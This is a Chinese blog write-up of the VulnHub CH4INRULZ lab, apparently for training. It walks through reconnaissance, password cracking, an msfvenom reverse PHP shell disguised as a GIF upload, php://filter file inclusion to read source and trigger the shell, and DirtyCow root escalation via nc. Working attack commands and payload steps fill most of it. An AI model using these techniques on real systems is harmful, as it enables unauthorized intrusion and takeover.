首页 > 其他分享 >vulnhub CH4INRULZ靶场

vulnhub CH4INRULZ靶场

时间:2023-12-14 15:11:47浏览次数:26  
标签:192.168 CH4INRULZ echo 42.151 vulnhub file 靶场 php 上传

1.信息收集

扫描主机

sudo arp-scan -l

1

扫描端口

nmap -p- 192.168.42.151

2

查看端口服务

nmap -A -sV -p 21,22,80,8011

3

4

21端口 ftp 没有有效信息,所以重点在80,8011

2.漏洞挖掘

开始网站浏览

6

没找到有用信息,开始网站目录搜索(因为默认为80端口,所以我们要扫描8011端口)

dirb http://192.168.42.151

dirb http://192.168.42.151:8011

7

dirb http://192.168.42.151 -X .bak

8

查看源代码,发现敏感目录,登录账号

cat index.html.bak

192.168.42.151/development/

9

发现密码格式不对,暴力破解密码成功
john 1.txt

10

登录deve界面,读题发现上传。

11

访问/api页面,发现文件包含漏洞,尝试利用

15

3.漏洞利用

找到上传口

192.168.42.151/development/uploader/

12

3.1msf生成php木马

msfvenom -p php/reverse_php lhost=192.168.42.151 lport=8888 -o shell.php

是反弹shell,写自己地址

16

3.2kali自带的php木马

/usr/share/webshells/php/

114

改前面GIF98,后缀.gif

17

木马上传成功

找不到上传路径,继续文件包含

19

尝试读取源代码

php伪协议

尝试读取源代码

file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php

20

得到源代码,发现上传路径

<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
  $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
  if($check !== false) {
    echo "File is an image - " . $check["mime"] . ".";
    $uploadOk = 1;
  } else {
    echo "File is not an image.";
    $uploadOk = 0;
  }
}
// Check if file already exists
if (file_exists($target_file)) {
  echo "Sorry, file already exists.";
  $uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
  echo "Sorry, your file is too large.";
  $uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
  echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
  $uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
  echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
  if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
    echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
  } else {
    echo "Sorry, there was an error uploading your file.";
  }
}
?>

用文件包含目录调用木马

file=/var/www/development/uploader/FRANKuploads/shell.gif

24 (2)

反弹shell

23

4.提升权限

查看内核版本,内核提权

uname -a

1 (2)

在漏洞库中查找(脏牛提权)

searchsploit dirty

2 (2)

下载提权脚本

searchsploit -m linux/local/40839.c

3 (2)

上传脚本(nc 上传)

攻击机

4 (2)

受害机

5 (2)

在受害机编译脚本

gcc -pthread dirty.c -o dirty -lcrypt

111

执行脚本(可以先看看有没有执行权限)

./dirty 123456

看见firefart用户就成功

1111

提权成功

su firefart

标签:192.168,CH4INRULZ,echo,42.151,vulnhub,file,靶场,php,上传
From: https://www.cnblogs.com/xiheaaa/p/17901215.html

相关文章

  • vulnhub CH4INRULZ靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.151查看端口服务nmap-A-sV-p21,22,80,801121端口ftp没有有效信息,所以重点在80,80112.漏洞挖掘开始网站浏览没找到有用信息,开始网站目录搜索192.168.42.151/api/dirbhttp://192.168.42.151......
  • vulnhub-wp Billy Madison
    ......
  • vulnhub DC-9靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口,发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能,猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功,存在注入漏洞,开始利用bp......
  • DC-8靶场
    准备:目标:获得root权限攻击虚拟机:kali  DC-8靶场:DC:8~VulnHub 虚拟机:IP地址 192.168.88.130 靶场IP地址:192.168.88.129 第一步:信息收集通过arp-scan-l查看本网段的虚拟机也可以通过nmap或者 netdiscover-r192.168.88.0/24netdiscover-r192.168.88......
  • vulnhub DC-5靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyri......
  • vulnhub DC-4靶场
    1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹,没有收获查找目录,无敏感信息2.漏洞利用访问网站,发现只有登录框,猜测为弱密码或密码爆破bp爆破成功(为了节省时间,我假设知道username,爆破真的太慢了)账号密码为adminhappy进入网......
  • vulnhub DC-1靶场
    1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹,发现Drupal7cms2.得到shell(2.1,2.2)只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2......
  • Polar靶场web刷题记录
    Polar靶场web刷题记录简单部分swp考点:敏感文件、preg_match()函数绕过根据题目名提示访问/.index.php.swp可以用代码格式化工具美化一下functionjiuzhe($xdmtql){ returnpreg_match('/sys.*nb/is',$xdmtql);}$xdmtql=@$_POST['xdmtql'];if(!is_array($xdmtql)){......
  • covfefe靶场
    covfefe靶机渗透1.信息收集扫描出多个IPnmap只发现192.168.42.146有端口开放,为22,80,31337扫描192.168.42.146的22,80,31337端口,看看开放的服务用dirb找找目录2.资源分析查看robots.txt,寻找目录访问taxes,拿到flag1进入ssh目录,下载rsa,pub3.漏洞利用下载了ssh的公......
  • vulnhub-Deathnote
    Deathnote0x01信息收集渗透的第一件事那就是信息收集,虚拟机启动起来,nmap扫一手, 192.168.56.101存在,并且开启了80和22端口,那么就访问页面。但是页面返回的结果是没找到http://deathnote.vuln这个网址 那么根据我做题的经验,这应该是需要绑定域名的,意思就是192.168.56.101......